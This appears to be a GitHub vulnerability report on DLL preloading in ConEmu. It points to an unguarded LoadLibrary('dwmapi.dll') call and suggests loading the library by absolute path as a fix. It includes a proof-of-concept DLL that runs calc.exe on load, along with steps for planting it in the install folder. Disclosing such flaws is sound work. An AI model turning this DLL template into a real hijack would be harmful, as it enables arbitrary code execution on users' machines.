You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe
so, attacker can moved to malicious dll file (filename is dwmapi.dll) in Directory where ConEmuPack installed, and can execute arbitrary code excution.
Steps to reproduce
Generate Malicious DLL File :
#include"pch.h"
#include"framework.h"
#include<Windows.h>
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
WinExec((LPSTR)"cmd.exe /c calc.exe", SW_SHOW);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
returnTRUE;
}
this code invoke calc.exe.
put it down in directory ConEmuPack A is installed as dwmapi.dll
Just Click ConEmu64.exe.
Actual results
ConEmu.exe and ConEmu64.exe must not effect DLL Preloading,
Expected results
ConEmu.exe and ConEmu64.exe is effected by DLL Preloading,
we can use Absolute Path, and can use GetSystemDirectory() function to combine the System Directory path with the DLL file name(in this case, dwmapi.dll) to defend it.
Sorry for my Bad English 😢
The text was updated successfully, but these errors were encountered:
Versions
ConEmu build: v23.07.24 x64 (Portable Version : ConEmuPack.230724.7z )
OS version: Windows 11 Pro x64 (Build 22621)
Used shell version (Far Manager, git-bash, cmd, powershell, cygwin, whatever): Explorer.exe
Problem description
When ComEmu64.exe is executed,
CDwmHelper::InitDwm ()
Method is invoked. ( https://github.com/Maximus5/ConEmu/blob/master/src/ConEmu/DwmHelper.cpp )and in this Method, when Loading
dwmapi.dll
,LoadLibrary
Function has no flag to prevent DLL Preloading.ConEmu/src/ConEmu/DwmHelper.cpp
Line 111 in 740b09c
mh_DwmApi = LoadLibrary(_T("dwmapi.dll"));
so, attacker can moved to malicious dll file (filename is
dwmapi.dll
) in Directory where ConEmuPack installed, and can execute arbitrary code excution.Steps to reproduce
this code invoke
calc.exe
.dwmapi.dll
ConEmu64.exe
.Actual results
ConEmu.exe and ConEmu64.exe must not effect DLL Preloading,
Expected results
ConEmu.exe and ConEmu64.exe is effected by DLL Preloading,
Additional files
PoC :
How to Solve
https://support.microsoft.com/en-au/topic/secure-loading-of-libraries-to-prevent-dll-preloading-attacks-d41303ec-0748-9211-f317-2edc819682e1
we can use
Absolute Path
, and can useGetSystemDirectory()
function to combine the System Directory path with the DLL file name(in this case,dwmapi.dll
) to defend it.Sorry for my Bad English 😢
The text was updated successfully, but these errors were encountered: